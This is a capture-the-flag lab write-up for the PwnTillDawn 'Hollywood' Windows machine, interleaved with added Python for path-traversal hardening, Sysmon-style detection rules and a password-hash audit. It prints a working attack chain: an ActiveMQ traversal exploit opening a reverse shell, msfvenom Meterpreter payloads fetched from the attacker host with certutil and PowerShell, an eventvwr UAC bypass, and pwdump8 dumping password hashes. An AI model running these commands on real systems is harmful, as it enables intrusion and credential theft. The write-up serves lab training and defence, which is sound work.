As always, we start with an nmap scan of all TCP ports.
┌─[user@parrot-virtual]─[~/ptd]
└──╼ $nmap -Pn -p1-65535 10.150.150.219
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 08:55 BST
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 80.05% done; ETC: 08:56 (0:00:07 remaining)
Nmap scan report for 10.150.150.219
Host is up (0.032s latency).
Not shown: 65502 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
25/tcp    open  smtp
79/tcp    open  finger
80/tcp    open  http
105/tcp   open  csnet-ns
106/tcp   open  pop3pw
110/tcp   open  pop3
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
143/tcp   open  imap
443/tcp   open  https
445/tcp   open  microsoft-ds
554/tcp   open  rtsp
1883/tcp  open  mqtt
2224/tcp  open  efi-mg
2869/tcp  open  icslap
3306/tcp  open  mysql
5672/tcp  open  amqp
8009/tcp  open  ajp13
8080/tcp  open  http-proxy
8089/tcp  open  unknown
8161/tcp  open  patrol-snmp
10243/tcp open  unknown
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
49251/tcp open  unknown
61613/tcp open  unknown
61614/tcp open  unknown
61616/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 37.57 seconds
┌─[user@parrot-virtual]─[~/ptd]
└──╼ $
Next we browse to http://10.150.150.219:8161/, which shows the "Welcome to the Apache ActiveMQ!" page. This ActiveMQ version has a Metasploit exploit, the directory traversal file upload described at https://www.exploit-db.com/exploits/42283 (the msf module is windows/http/apache_activemq_traversal_upload, as the output below shows).
msf6 exploit(windows/http/apache_activemq_traversal_upload) > show options

Module options (exploit/windows/http/apache_activemq_traversal_upload):

   Name       Current Setting        Required  Description
   ----       ---------------        --------  -----------
   PASSWORD   admin                  yes       Password to authenticate with
   PATH       /fileserver/..\admin\  yes       Traversal path
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.150.150.219         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8161                   yes       The target port (TCP)
   SSL        false                  no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                      yes       The base path to the web application
   USERNAME   admin                  yes       Username to authenticate with
   VHOST                             no        HTTP server virtual host

Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.66.66.210     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.

Exploit target:

   Id  Name
   --  ----
   0   Windows Java

msf6 exploit(windows/http/apache_activemq_traversal_upload) > run

[*] Started reverse TCP handler on 10.66.66.210:4444
[*] Uploading payload...
[*] Payload sent. Attempting to execute the payload.
[+] Payload executed!
[*] Command shell session 1 opened (10.66.66.210:4444 -> 10.150.150.219:49284) at 2020-08-26 09:18:27 +0100

C:\Users\User\Desktop\apache-activemq-5.11.1-bin\apache-activemq-5.11.1\bin>whoami
whoami
hollywood\user

C:\Users\User\Desktop\apache-activemq-5.11.1-bin\apache-activemq-5.11.1\bin>
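The PATH option above, /fileserver/..\admin\, is the whole bug: the fileserver servlet joins a client-supplied path under its document root without normalising it first, so a backslash traversal walks out of fileserver and into admin, where the uploaded JSP gets served. As an added example (my own Python, not code from the original post or from the ActiveMQ code base), here is the naive join beside a hardened one. DOC_ROOT, naive_join, safe_join and is_contained are my own names and the root path is assumed.

```python
import posixpath
from urllib.parse import unquote

# Assumed document root for the constructed example; not taken from the target.
DOC_ROOT = "/opt/activemq/webapps/fileserver"


def naive_join(root, client_path):
    """Vulnerable form: only looks for the forward-slash spelling of '..',
    so a Windows-style '..\\admin\\' (the form the module on this page uses)
    passes straight through and is later resolved by the filesystem."""
    if "../" in client_path:
        raise ValueError("traversal rejected")
    return root.rstrip("/") + "/" + client_path.lstrip("/")


def safe_join(root, client_path):
    """Hardened form: percent-decode (twice, to catch double encoding),
    unify both separator kinds, normalise, and only then check that the
    result still lies beneath root. Returns the resolved path or raises."""
    decoded = unquote(unquote(client_path))
    unified = decoded.replace("\\", "/")
    candidate = posixpath.normpath(root.rstrip("/") + "/" + unified.lstrip("/"))
    root_norm = posixpath.normpath(root)
    if candidate != root_norm and not candidate.startswith(root_norm + "/"):
        raise ValueError("traversal rejected")
    return candidate


def is_contained(root, client_path):
    """True if the hardened join accepts the path, False if it rejects it."""
    try:
        safe_join(root, client_path)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for p in ["reports/q3.txt", "..\\admin\\note.txt", "%2e%2e/admin/note.txt"]:
        print(f"{p!r:32} naive={'ok' if '../' not in p else 'rejected':9} hardened={is_contained(DOC_ROOT, p)}")
```

The naive check is exactly why the module spells the traversal with backslashes. The hardened version compares normalised prefixes instead of searching for a pattern, which is the check to apply to any user-controlled path. Note that for this ActiveMQ release the vendor fix was to remove the fileserver web application from conf/jetty.xml rather than to patch the path handling, so on a server you still run, check that the fileserver context is gone rather than trusting an upgrade alone.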
Next we create a Meterpreter executable with msfvenom and serve it over HTTP.
┌─[user@parrot-virtual]─[~/Downloads]
└──╼ $msfvenom -p windows/meterpreter/reverse_tcp lhost=10.66.66.210 lport=7777 -f exe > 7777.exe
┌─[✗]─[user@parrot-virtual]─[~/Downloads]
└──╼ $sudo python3 -m http.server 80
[sudo] password for user:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.150.150.219 - - [26/Aug/2020 09:25:00] "GET /7777.exe HTTP/1.1" 200 -
10.150.150.219 - - [26/Aug/2020 09:25:00] "GET /7777.exe HTTP/1.1" 200 -
c:\puck>certutil -urlcache -split -f http://10.66.66.210/7777.exe c:\puck\7777.exe
certutil -urlcache -split -f http://10.66.66.210/7777.exe c:\puck\7777.exe
****  Online  ****
  000000  ...
  01204a
CertUtil: -URLCache command completed successfully.

c:\puck>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 021A-9C32

 Directory of c:\puck

08/26/2020  05:21 PM    <DIR>          .
08/26/2020  05:21 PM    <DIR>          ..
08/26/2020  05:21 PM            73,802 7777.exe
               1 File(s)         73,802 bytes
               2 Dir(s)  44,543,938,560 bytes free

c:\puck>
Start the listener, then execute the downloaded payload on the target with c:\puck>7777.exe.
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
lhost => 10.66.66.210
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.66.66.210:7777
msf6 exploit(multi/handler) >
msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type              Information                                                                       Connection
  --  ----  ----              -----------                                                                       ----------
  1         shell java/linux  Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  10.66.66.210:4444 -> 10.150.150.219:49284 (10.150.150.219)

msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

c:\puck>7777.exe
7777.exe

c:\puck>
[*] Sending stage (175174 bytes) to 10.150.150.219
[*] Meterpreter session 2 opened (10.66.66.210:7777 -> 10.150.150.219:49293) at 2020-08-26 09:32:53 +0100

c:\puck>
c:\puck>^Z
Background session 1? [y/N]  y
msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                                                                       Connection
  --  ----  ----                     -----------                                                                       ----------
  1         shell java/linux         Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  10.66.66.210:4444 -> 10.150.150.219:49284 (10.150.150.219)
  2         meterpreter x86/windows  HOLLYWOOD\User @ HOLLYWOOD                                                        10.66.66.210:7777 -> 10.150.150.219:49293 (10.150.150.219)

msf6 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > hashdump
[-] 2007: Operation failed: The parameter is incorrect.
meterpreter >
meterpreter > shell
Process 5088 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\puck>whoami
whoami
hollywood\user

c:\puck>
c:\puck>^Z
Background channel 1? [y/N]  y
meterpreter >
Background session 2? [y/N]
msf6 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester

msf6 exploit(multi/handler) > use 0
msf6 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.150.150.219 - Collecting local exploits for x86/windows...
[*] 10.150.150.219 - 34 exploit checks are being tried...
[+] 10.150.150.219 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.150.150.219 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) >
msf6 exploit(windows/local/bypassuac_eventvwr) > set lhost tun0
lhost => tun0
msf6 exploit(windows/local/bypassuac_eventvwr) > set session 2
session => 2
msf6 exploit(windows/local/bypassuac_eventvwr) > run

[-] Handler failed to bind to 10.66.66.210:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\System32\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (175174 bytes) to 10.150.150.219
[*] Meterpreter session 3 opened (10.66.66.210:4444 -> 10.150.150.219:49300) at 2020-08-26 09:44:50 +0100
[*] Cleaning up registry keys ...
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_eventvwr) >
msf6 exploit(windows/local/bypassuac_eventvwr) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                                                                       Connection
  --  ----  ----                     -----------                                                                       ----------
  1         shell java/linux         Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  10.66.66.210:4444 -> 10.150.150.219:49284 (10.150.150.219)
  2         meterpreter x86/windows  HOLLYWOOD\User @ HOLLYWOOD                                                        10.66.66.210:7777 -> 10.150.150.219:49293 (10.150.150.219)
  3         meterpreter x86/windows  HOLLYWOOD\User @ HOLLYWOOD                                                        10.66.66.210:4444 -> 10.150.150.219:49300 (10.150.150.219)

msf6 exploit(windows/local/bypassuac_eventvwr) >
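Two of the steps so far are very loud if process and registry telemetry is being collected, and this box does run a Splunk forwarder (see splunkd.exe in the process list below). The certutil -urlcache download is a classic living-off-the-land pattern, and the eventvwr bypass works by planting a command under the current user's HKCU\Software\Classes\mscfile\shell\open\command, which the auto-elevating eventvwr.exe then launches; that is what the module's "Configuring payload and stager registry keys" line is doing. The following Python is an added example, not from the original post or from Metasploit: it runs three rules over constructed Sysmon-style key=value lines modelled on Event ID 1 (process create) and Event ID 13 (registry value set). The line format, the SID, the file names in the benign lines and the rule names are my own.

```python
import re

# Constructed sample telemetry for this write-up, not real logs from the target.
# One event per line, simplified from Sysmon Event ID 1 and Event ID 13 fields.
SAMPLE_EVENTS = [
    # certutil used as a downloader, as in the step on this page
    'EventID=1 Image=C:\\Windows\\System32\\certutil.exe '
    'CommandLine="certutil -urlcache -split -f http://10.66.66.210/7777.exe c:\\puck\\7777.exe" '
    'ParentImage=C:\\Windows\\System32\\cmd.exe',
    # benign certutil use (hashing a file): must not fire
    'EventID=1 Image=C:\\Windows\\System32\\certutil.exe '
    'CommandLine="certutil -hashfile c:\\puck\\setup.msi SHA256" '
    'ParentImage=C:\\Windows\\System32\\cmd.exe',
    # registry value the eventvwr bypass plants (SID is made up)
    'EventID=13 Image=C:\\puck\\7777.exe '
    'TargetObject=HKU\\S-1-5-21-1-2-3-1000\\Software\\Classes\\mscfile\\shell\\open\\command\\(Default) '
    'Details=C:\\puck\\7777.exe',
    # eventvwr.exe started by the implant instead of by explorer.exe
    'EventID=1 Image=C:\\Windows\\System32\\eventvwr.exe '
    'CommandLine="C:\\Windows\\System32\\eventvwr.exe" '
    'ParentImage=C:\\puck\\7777.exe',
    # unrelated registry write under Classes: must not fire
    'EventID=13 Image=C:\\Windows\\regedit.exe '
    'TargetObject=HKU\\S-1-5-21-1-2-3-1000\\Software\\Classes\\.txt\\(Default) '
    'Details=txtfile',
]

# key=value pairs; values are either double-quoted (may contain spaces) or bare
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line):
    """Turn one constructed event line into a dict of its fields."""
    return {key: (quoted if quoted else bare) for key, quoted, bare in KV_RE.findall(line)}


def detect(event):
    """Return the names of the rules that fire on one parsed event."""
    hits = []
    eid = event.get("EventID")
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "").lower()
    parent = event.get("ParentImage", "").lower()
    target = event.get("TargetObject", "").lower()

    # Rule 1: certutil fetching a URL into the cache (download-cradle use)
    if eid == "1" and image.endswith("\\certutil.exe") and "-urlcache" in cmd and "http" in cmd:
        hits.append("certutil_urlcache_download")
    # Rule 2: a write to the mscfile handler key that eventvwr.exe consults
    if eid == "13" and "\\software\\classes\\mscfile\\shell\\open\\command" in target:
        hits.append("mscfile_handler_hijack")
    # Rule 3 (heuristic): eventvwr.exe not launched from the shell
    if eid == "1" and image.endswith("\\eventvwr.exe") and not parent.endswith("\\explorer.exe"):
        hits.append("eventvwr_unusual_parent")
    return hits


def scan(lines):
    """Run every rule over every line; return [(line_index, rule_name), ...]."""
    findings = []
    for index, line in enumerate(lines):
        for rule in detect(parse_event(line)):
            findings.append((index, rule))
    return findings


if __name__ == "__main__":
    for index, rule in scan(SAMPLE_EVENTS):
        print(f"line {index}: {rule}")
```

Rule 2 is the high-confidence one: there is no legitimate reason for a user-hive write to the mscfile open command, and the module's own "Cleaning up registry keys" step means the value only exists for a few seconds, so the SetValue event is the artefact that survives. Rule 3 is a heuristic and will need tuning for administrators who launch Event Viewer from scripts or RMM tools.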
msf6 exploit(windows/local/bypassuac_eventvwr) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                x86   0
 244   4     smss.exe              x86   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 328   312   csrss.exe             x86   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 364   3876  xampp-control.exe     x86   1        HOLLYWOOD\User                C:\xampp\xampp-control.exe
 400   3876  cmd.exe               x86   1        HOLLYWOOD\User                C:\Windows\system32\cmd.exe
 408   312   wininit.exe           x86   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
 416   400   csrss.exe             x86   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 464   400   winlogon.exe          x86   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
 512   408   services.exe          x86   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
 520   408   lsass.exe             x86   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
 528   408   lsm.exe               x86   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsm.exe
 624   512   svchost.exe           x86   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
 684   512   vmacthlp.exe          x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 728   512   svchost.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 816   512   svchost.exe           x86   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 864   512   svchost.exe           x86   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 892   512   svchost.exe           x86   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 912   416   conhost.exe           x86   1        HOLLYWOOD\User                C:\Windows\system32\conhost.exe
 916   512   svchost.exe           x86   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
 1028  512   svchost.exe           x86   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
 1200  512   svchost.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 1224  512   svchost.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 1384  512   spoolsv.exe           x86   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1412  512   svchost.exe           x86   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 1504  512   svchost.exe           x86   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1612  416   conhost.exe           x86   1        HOLLYWOOD\User                C:\Windows\system32\conhost.exe
 1664  512   splunkd.exe           x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
 1700  512   dllhost.exe           x86   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\dllhost.exe
 1728  328   conhost.exe           x86   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\conhost.exe
 1760  512   VGAuthService.exe     x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
 1816  512   vmtoolsd.exe          x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1832  624   WmiPrvSE.exe          x86   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\wbem\wmiprvse.exe
 1880  364   mysqld.exe            x86   1        HOLLYWOOD\User                c:\xampp\mysql\bin\mysqld.exe
 2240  512   SearchIndexer.exe     x86   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\SearchIndexer.exe
 2520  1664  splunk-winevtlog.exe  x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
 2640  364   FileZillaServer.exe   x86   1        HOLLYWOOD\User                c:\xampp\filezillaftp\filezillaserver.exe
 2676  364   mercury.exe           x86   1        HOLLYWOOD\User                c:\xampp\MercuryMail\mercury.exe
 2748  400   java.exe              x86   1        HOLLYWOOD\User                C:\Program Files\Common Files\Oracle\Java\javapath\java.exe
 2824  3876  jusched.exe           x86   1        HOLLYWOOD\User                C:\Program Files\Common Files\Java\Java Update\jusched.exe
 2908  3916  httpd.exe             x86   1        HOLLYWOOD\User                C:\xampp\apache\bin\httpd.exe
 2992  5004  cmd.exe               x86   1        HOLLYWOOD\User                C:\Windows\system32\cmd.exe
 3008  2748  cmd.exe               x86   1        HOLLYWOOD\User                C:\Windows\system32\cmd.exe
 3124  416   conhost.exe           x86   1        HOLLYWOOD\User                C:\Windows\system32\conhost.exe
 3156  3876  vmtoolsd.exe          x86   1        HOLLYWOOD\User                C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 3472  364   cmd.exe               x86   1        HOLLYWOOD\User                C:\Windows\System32\cmd.exe
 3548  512   taskhost.exe          x86   1        HOLLYWOOD\User                C:\Windows\system32\taskhost.exe
 3640  416   conhost.exe           x86   1        HOLLYWOOD\User                C:\Windows\system32\conhost.exe
 3776  3472  java.exe              x86   1        HOLLYWOOD\User                C:\Program Files\Java\jre1.8.0_231\bin\java.exe
 3820  512   svchost.exe           x86   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 3840  864   dwm.exe               x86   1        HOLLYWOOD\User                C:\Windows\system32\Dwm.exe
 3856  416   conhost.exe           x86   1        HOLLYWOOD\User                C:\Windows\system32\conhost.exe
 3876  3608  explorer.exe          x86   1        HOLLYWOOD\User                C:\Windows\Explorer.EXE
 3916  364   httpd.exe             x86   1        HOLLYWOOD\User                c:\xampp\apache\bin\httpd.exe
 3968  512   wmpnetwk.exe          x86   0        NT AUTHORITY\NETWORK SERVICE  C:\Program Files\Windows Media Player\wmpnetwk.exe
 4080  512   svchost.exe           x86   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 4632  416   conhost.exe           x86   1        HOLLYWOOD\User                C:\Windows\system32\conhost.exe
 4824  512   taskhost.exe          x86   1        HOLLYWOOD\User                C:\Windows\system32\taskhost.exe
 4912  416   conhost.exe           x86   1        HOLLYWOOD\User                C:\Windows\system32\conhost.exe
 5004  3008  7777.exe              x86   1        HOLLYWOOD\User                c:\puck\7777.exe
 5088  5004  cmd.exe               x86   1        HOLLYWOOD\User                C:\Windows\system32\cmd.exe
 5356  4372  powershell.exe        x86   1        HOLLYWOOD\User                C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
 5904  416   conhost.exe           x86   1        HOLLYWOOD\User                C:\Windows\system32\conhost.exe

meterpreter > migrate 3820
[*] Migrating from 5356 to 3820...
[*] Migration completed successfully.
meterpreter > shell
Process 5184 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>
certutil -urlcache -split -f http://10.66.66.210/fgdump.exe c:\puck\fgdump.exe
certutil -urlcache -split -f http://10.66.66.210/winpeas.exe c:\puck\winpeas.exe
certutil -urlcache -split -f http://10.66.66.210/winpeas.bat c:\puck\winpeas.bat
certutil -urlcache -split -f http://10.66.66.210/Chimichurri.exe c:\puck\Chimichurri.exe
certutil -urlcache -split -f http://10.66.66.210/7777.exe c:\puck\7777.exe
└──╼ $msfvenom -p windows/meterpreter/reverse_tcp lhost=10.66.66.210 lport=7777 -f exe > 7777.exe
multi/handler
run -j
powershell Invoke-Webrequest -OutFile C:\Windows\System32\spool\drivers\color\pwdump7.exe -Uri http://10.66.66.210/pwdump7.exe
certutil -urlcache -split -f http://10.66.66.210/pwdump8.exe c:\puck\pwdump8.exe
c:\puck>pwdump8.exe
pwdump8.exe
PwDump v8.2 - dumps windows password hashes - by Fulvio Zanetti & Andrea Petralia @ http://www.blackMath.it
Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
User:1000:AAD3B435B51404EEAAD3B435B51404EE:F9E1A02072D330DDF77AD82CB54D5EC4
HomeGroupUser$:1002:AAD3B435B51404EEAAD3B435B51404EE:283C3C4DC5544A73569F35F22A5B1DCA
c:\puck>
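Each pwdump line is user:RID:LM:NT. The LM field AAD3B435B51404EEAAD3B435B51404EE on every account means no LM hash is stored (the value is the LM hash of an empty string, which is what Windows writes when LM storage is off), and the NT value 31D6CFE0D16AE931B73C59D7E0C089C0 on Administrator and Guest is the NT hash of an empty password. As an added example, not from the original post and not part of pwdump, here is a Python parser that takes the raw paste above (prompt and banner included, to show they are skipped) and flags empty passwords, stored LM hashes and accounts that share a password. The function and rule names are my own.

```python
# Well-known constants: LM hash of "" (also what Windows stores when LM hashes
# are disabled) and NT hash (MD4 of UTF-16LE "") of an empty password.
EMPTY_LM = "AAD3B435B51404EEAAD3B435B51404EE"
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"

# Raw console paste from this write-up, used here as constructed sample input.
SAMPLE_DUMP = r"""
c:\puck>pwdump8.exe
pwdump8.exe
PwDump v8.2 - dumps windows password hashes - by Fulvio Zanetti & Andrea Petralia @ http://www.blackMath.it
Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
User:1000:AAD3B435B51404EEAAD3B435B51404EE:F9E1A02072D330DDF77AD82CB54D5EC4
HomeGroupUser$:1002:AAD3B435B51404EEAAD3B435B51404EE:283C3C4DC5544A73569F35F22A5B1DCA
c:\puck>
"""


def parse_pwdump(text):
    """Parse user:rid:lm:nt lines; anything with fewer than three colons
    (prompts, the banner, blank lines) is not a hash record and is skipped."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.count(":") < 3:
            continue
        user, rid, lm, nt = line.split(":")[:4]
        entries.append({"user": user, "rid": int(rid), "lm": lm.upper(), "nt": nt.upper()})
    return entries


def audit(entries):
    """Return [(account, finding), ...] for the weak states worth reporting."""
    findings = []
    by_nt = {}
    for e in entries:
        if e["nt"] == EMPTY_NT:
            findings.append((e["user"], "empty_password"))
        if e["lm"] != EMPTY_LM:
            # LM hashes are case-insensitive and split into two 7-byte halves,
            # so any stored LM hash is effectively a cracked password.
            findings.append((e["user"], "lm_hash_stored"))
        by_nt.setdefault(e["nt"], []).append(e["user"])
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings.append((",".join(users), "shared_password"))
    return findings


if __name__ == "__main__":
    for account, finding in audit(parse_pwdump(SAMPLE_DUMP)):
        print(f"{account}: {finding}")
```

One caveat before reading "empty_password" as a live blank password: an empty NT hash is also what you see on a disabled account, and the built-in Administrator on Windows 7 ships disabled with a blank password. Cross-check account status (net user Administrator on the host) before raising it as a finding. The User account's hash is the one that matters here, since that is the account running the ActiveMQ service and the one that turned out to be a local admin.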
C:\Windows\system32>powershell -c Get-PSDrive
REG QUERY HKLM /v "EditionID" /s
Write-ups have been authorized for this machine by the PwnTillDawn Crew! We are just asking you to give us credit by adding a backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.
Incredibly well written, amazing to follow.
Would you know why msf is coming back with a failed upload, for example? It happened countless times.